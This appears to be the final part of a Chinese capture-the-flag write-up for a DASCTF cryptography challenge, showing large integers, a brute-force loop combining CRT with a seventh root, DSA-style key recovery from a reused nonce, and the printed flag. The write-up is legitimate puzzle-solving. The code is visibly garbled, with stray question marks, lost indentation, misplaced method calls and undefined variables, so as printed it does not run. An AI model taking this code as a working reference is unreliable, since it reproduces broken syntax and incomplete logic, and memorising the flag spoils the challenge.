8592401118703567187475890102871950516388778938283577066421804574346522278885925
8272826217869877607314144,
1643631850318055151946938381389671039738824953272816402371095118047179758846703
0709318502386682626254448265648334522948071105444415378301997520500406974409481
46092723713661125309994275256,
1094958701601679594044597619846014925814463536699645559860524474354072876463594
7061037779912661207322820180541114179612916018317600403816027703391110922112311
9109000344423403873040067615897089438143963031830858583569615372791631753848480
10568152485779372842]
for b1 in range(25):
for b2 in range(25):
? for b3 in range(25):
? rx=[xl[0][b1],xl[1][b2],xl[2][b3]]
? if CRT(rx,c1) and iroot(CRT(rx,c1),7)[1]==True: ? print(iroot(CRT(rx,c1),7)[0])
同样的?法求得m2
#m1=838290559066247866659511413692971370713213136172089233104843727482852922670
4174
#m2=103368524056304889441983475774752666932349603981378500453989906291165448639
21454
m1=long_to_bytes(m1)
m2=long_to_bytes(m2)
h1=bytes_to_long(SHA.new(m1)).digest()
h2=bytes_to_long(SHA.new(m2)).digest()
n=85198615386075607567070020969981777827671873654631200472078241980737834438897
9001462488402791911391564165371083996828743706298882073345062370400178383135589
1127507390414845154025570581847758118286626941301826307985868022164734168076298
9080418039972704759003343616652475438155806858735982352930771244880990190318526
933267455248913782297991685041187565140859
d=10623995021320631630168390754576391633605524395570621094473647242596520010346
1421781804731678430116333702099777855279469137219165293725500887590280355973107
5807452123689375140700599918489480317182538046946218217349576048381252109517115
27151265000736896607029198
t=60132176395922896902518845244051065417143507550519860211077965501783315971109
4335444824112082384851355540652418649563616768782203425002080110893837512254374
1704989372554617679941718887597267729368003300539988311353119370535340489214181
1493415079755456185858889801456386910892239869732805273879281094613329645326287
205736614546311143635580051444446576104548
q=iroot(n//d)[0] P=n//q G=invert(t,n) K=invert(s1-s2,q)*(h1-h2)%q
X1=invert(r1,q)*(k*s1-h1)%q
X2=(s3*k-h1)*invert(r2,q)%q
print(long_to_bytes(X1))
print(long_to_bytes(X2))
DASCTF{f11bad18f529750fe52c56eed85d001b}
作者:light1ng小伙伴